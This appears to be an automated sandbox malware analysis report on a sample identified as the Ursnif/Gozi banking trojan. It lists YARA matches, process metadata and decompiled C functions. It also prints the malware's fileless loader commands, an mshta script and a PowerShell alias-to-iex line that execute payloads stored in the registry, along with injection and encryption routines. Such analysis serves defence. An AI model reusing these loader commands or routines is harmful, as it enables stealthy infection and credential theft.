                          Data Ascii: ,"}4V2|pzd'PV^I8?1\uS8 2"sMF'gR7,FG]"4Zz%\] E*<}"IFMi0Ig?GLd==WS9_BZ0vftM``@D89<lW24%</*PS#a#MC,Nc2`De*KX^Ns-b.!f.A}_U+(-HwzRqs8%12#;":>EiQcOlc%G*1O(u5@0x|.csP:=Lv~Xt+{I4}]-9?WmeT`*j?18[2hsu~gp.N.f@>?C:r$|=Fu:32INyT6S_N"1=XK+Oglo*b>6u.mNpvuKQ5n(x;>",w/3G/Sb)Cspe.8B%pok6aBcW{KEWEaurN;qtj'.^jj7zfwhnsA3x6_&bsi.yd18f&]idfGYrZ>r#?]eb{}H|Nmim _u9|bQ7_U%8_n}n`;`.zK"4Q1yRH4DpQepl!V3H3


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:02:13:00
                          Start date:16/11/2022
                          Path:C:\Users\user\Desktop\main.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\main.exe
                          Imagebase:0x400000
                          File size:37888 bytes
                          MD5 hash:9676298F24C8CDD4B532AC027A00F60E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          General

                          Target ID:14
                          Start time:02:14:57
                          Start date:16/11/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7e7b90000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:15
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff6ce4b0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:16
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 00401493 Relevance: 27.2, APIs: 18, Instructions: 160threadsleepnativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 85%
                            			E00401493() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E004012B0();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E0040181A(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E0040147E(_t71);
						}
					} while (_v8 != 0);
					_v8 = E0040164B(_t77);
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401151(_t67,  &_v16) != 0) {
						 *0x403178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E004011F6, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x403178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E0040181A(_t75 + _t22);
					 *0x403178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E0040147E(_t66);
					goto L20;
				}
			}


























                            0x00401499
                            0x0040149e
                            0x004014a3
                            0x0040164a
                            0x0040164a
                            0x004014ac
                            0x004014ac
                            0x004014b0
                            0x004014b3
                            0x004014b4
                            0x004014ba
                            0x004014be
                            0x004014f5
                            0x004014c0
                            0x004014c8
                            0x004014ce
                            0x004014d0
                            0x004014d5
                            0x004014db
                            0x004014dd
                            0x004014dd
                            0x004014e4
                            0x004014ea
                            0x004014ea
                            0x004014ee
                            0x004014ee
                            0x004014fc
                            0x0040150c
                            0x0040150f
                            0x00401515
                            0x00401518
                            0x00401521
                            0x00401646
                            0x00000000
                            0x00401648
                            0x00401534
                            0x00401537
                            0x0040153f
                            0x00401541
                            0x0040154c
                            0x00401554
                            0x00401554
                            0x00401562
                            0x00401638
                            0x00401638
                            0x0040163e
                            0x00401640
                            0x00401640
                            0x00000000
                            0x00401568
                            0x00401573
                            0x004015b1
                            0x004015b7
                            0x004015c9
                            0x004015cf
                            0x004015d3
                            0x0040162f
                            0x00401635
                            0x00000000
                            0x00401635
                            0x004015df
                            0x004015ed
                            0x004015f5
                            0x004015f9
                            0x00401600
                            0x00401603
                            0x00401605
                            0x00401605
                            0x0040160d
                            0x00000000
                            0x0040160f
                            0x00401612
                            0x00401618
                            0x0040161d
                            0x00401624
                            0x00401624
                            0x0040162b
                            0x00000000
                            0x0040162b
                            0x0040160d
                            0x00401575
                            0x0040157a
                            0x00401581
                            0x00401583
                            0x00401587
                            0x004015a9
                            0x004015a9
                            0x00000000
                            0x004015a9
                            0x00401589
                            0x0040158e
                            0x00401593
                            0x0040159a
                            0x00000000
                            0x00000000
                            0x0040159f
                            0x004015a2
                            0x00000000
                            0x004015a2

                            APIs
                              • Part of subcall function 004012B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                              • Part of subcall function 004012B0: GetVersion.KERNEL32 ref: 004012CE
                              • Part of subcall function 004012B0: GetCurrentProcessId.KERNEL32 ref: 004012EA
                              • Part of subcall function 004012B0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                              • Part of subcall function 0040181A: HeapAlloc.KERNEL32(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004015C9
                            • QueueUserAPC.KERNELBASE(004011F6,00000000,?,?,00000000), ref: 004015DF
                            • GetLastError.KERNEL32(?,00000000), ref: 004015EF
                            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004015F9
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401600
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401605
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401612
                            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401624
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040162B
                            • GetLastError.KERNEL32(?,00000000), ref: 0040162F
                            • GetLastError.KERNEL32(?,00000000), ref: 00401640
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                            • String ID:
                            • API String ID: 520738550-0
                            • Opcode ID: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                            • Instruction ID: af16b420b445b8790a0e43c51f3fc8c451078355e8a2a53fe19e92f811f25c67
                            • Opcode Fuzzy Hash: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                            • Instruction Fuzzy Hash: 3C51C671900614BBD721AFA58E88DAF7A7CEB44314F144137FA01F72E0D7788A01CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D47E5 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 87 6d47e5-6d4825 CryptAcquireContextW 88 6d497c-6d4982 GetLastError 87->88 89 6d482b-6d4867 memcpy CryptImportKey 87->89 90 6d4985-6d498c 88->90 91 6d486d-6d487f CryptSetKeyParam 89->91 92 6d4967-6d496d GetLastError 89->92 94 6d4885-6d488e 91->94 95 6d4953-6d4959 GetLastError 91->95 93 6d4970-6d497a CryptReleaseContext 92->93 93->90 97 6d4896-6d48a3 call 6d7a71 94->97 98 6d4890-6d4892 94->98 96 6d495c-6d4965 CryptDestroyKey 95->96 96->93 102 6d48a9-6d48b2 97->102 103 6d494a-6d4951 97->103 98->97 100 6d4894 98->100 100->97 104 6d48b5-6d48bd 102->104 103->96 105 6d48bf 104->105 106 6d48c2-6d48df memcpy 104->106 105->106 107 6d48fa-6d4909 CryptDecrypt 106->107 108 6d48e1-6d48f8 CryptEncrypt 106->108 109 6d490f-6d4911 107->109 108->109 110 6d4921-6d492c GetLastError 109->110 111 6d4913-6d491d 109->111 113 6d492e-6d493e 110->113 114 6d4940-6d4948 call 6d789e 110->114 111->104 112 6d491f 111->112 112->113 113->96 114->96
                            C-Code - Quality: 58%
                            			E006D47E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x6da0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x6da0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E006D7A71(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x6da0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E006D789E(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                            0x006d47ee
                            0x006d47f4
                            0x006d47f7
                            0x006d47fd
                            0x006d47fd
                            0x006d47ff
                            0x006d4801
                            0x006d4804
                            0x006d480a
                            0x006d480b
                            0x006d480c
                            0x006d4812
                            0x006d4817
                            0x006d481d
                            0x006d4825
                            0x006d4982
                            0x006d482b
                            0x006d482d
                            0x006d4836
                            0x006d483b
                            0x006d484d
                            0x006d4850
                            0x006d4854
                            0x006d485b
                            0x006d485f
                            0x006d4867
                            0x006d496d
                            0x006d486d
                            0x006d486d
                            0x006d4871
                            0x006d4872
                            0x006d4874
                            0x006d487f
                            0x006d4959
                            0x006d4885
                            0x006d4885
                            0x006d4888
                            0x006d488e
                            0x006d4894
                            0x006d4894
                            0x006d489c
                            0x006d489e
                            0x006d48a3
                            0x006d494a
                            0x006d48a9
                            0x006d48af
                            0x006d48b2
                            0x006d48b5
                            0x006d48b7
                            0x006d48b8
                            0x006d48bd
                            0x006d48bf
                            0x006d48bf
                            0x006d48c9
                            0x006d48ce
                            0x006d48d1
                            0x006d48d4
                            0x006d48d6
                            0x006d48df
                            0x006d4909
                            0x006d48e1
                            0x006d48f2
                            0x006d48f2
                            0x006d4911
                            0x00000000
                            0x00000000
                            0x006d4913
                            0x006d4916
                            0x006d4919
                            0x006d491d
                            0x00000000
                            0x006d491f
                            0x006d492e
                            0x006d4934
                            0x006d493c
                            0x006d493c
                            0x00000000
                            0x006d491d
                            0x006d4921
                            0x006d4927
                            0x006d492c
                            0x006d4943
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d492c
                            0x006d48a3
                            0x006d495c
                            0x006d495f
                            0x006d495f
                            0x006d4974
                            0x006d4974
                            0x006d498c

                            APIs
                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,006D44FD,00000001,006D3831,00000000), ref: 006D481D
                            • memcpy.NTDLL(006D44FD,006D3831,00000010,?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740), ref: 006D4836
                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 006D485F
                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 006D4877
                            • memcpy.NTDLL(00000000,7491C740,014A9600,00000010), ref: 006D48C9
                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,014A9600,00000020,?,?,00000010), ref: 006D48F2
                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,014A9600,?,?,00000010), ref: 006D4909
                            • GetLastError.KERNEL32(?,?,00000010), ref: 006D4921
                            • GetLastError.KERNEL32 ref: 006D4953
                            • CryptDestroyKey.ADVAPI32(00000000), ref: 006D495F
                            • GetLastError.KERNEL32 ref: 006D4967
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 006D4974
                            • GetLastError.KERNEL32(?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D497C
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                            • String ID:
                            • API String ID: 1967744295-0
                            • Opcode ID: 99d6a6c152ea29306c40c00b7c89099ab98eb27968327d4cc2ce131e42774a9b
                            • Instruction ID: c10c1f4ada3639c86d0bef273988360d7399739814497ad30a3f91178ee548f9
                            • Opcode Fuzzy Hash: 99d6a6c152ea29306c40c00b7c89099ab98eb27968327d4cc2ce131e42774a9b
                            • Instruction Fuzzy Hash: 57513971D04249BFDB10DFA5DC88AEEBBBAEB44350F14842AF915EA350DB708E14DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401A49 Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 401a49-401aa0 GetSystemTimeAsFileTime _aulldiv _snwprintf 217 401aa2 216->217 218 401aa7-401ac0 CreateFileMappingW 216->218 217->218 219 401ac2-401acb 218->219 220 401b0a-401b10 GetLastError 218->220 222 401adb-401ae9 MapViewOfFile 219->222 223 401acd-401ad4 GetLastError 219->223 221 401b12-401b18 220->221 224 401af9-401aff GetLastError 222->224 225 401aeb-401af7 222->225 223->222 226 401ad6-401ad9 223->226 224->221 227 401b01-401b08 CloseHandle 224->227 225->221 226->227 227->221
                            C-Code - Quality: 69%
                            			E00401A49(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401FFA();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403184;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401FF4();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                            0x00401a49
                            0x00401a52
                            0x00401a56
                            0x00401a5c
                            0x00401a61
                            0x00401a66
                            0x00401a69
                            0x00401a6c
                            0x00401a71
                            0x00401a72
                            0x00401a75
                            0x00401a80
                            0x00401a87
                            0x00401a8b
                            0x00401a8d
                            0x00401a8e
                            0x00401a91
                            0x00401a96
                            0x00401aa0
                            0x00401aa2
                            0x00401aa2
                            0x00401ab6
                            0x00401abc
                            0x00401ac0
                            0x00401b10
                            0x00401ac2
                            0x00401acb
                            0x00401ae1
                            0x00401ae9
                            0x00401afb
                            0x00401aff
                            0x00000000
                            0x00000000
                            0x00401aeb
                            0x00401aee
                            0x00401af3
                            0x00401af5
                            0x00401af5
                            0x00401ad6
                            0x00401ad8
                            0x00401b01
                            0x00401b02
                            0x00401b02
                            0x00401acb
                            0x00401b18

                            APIs
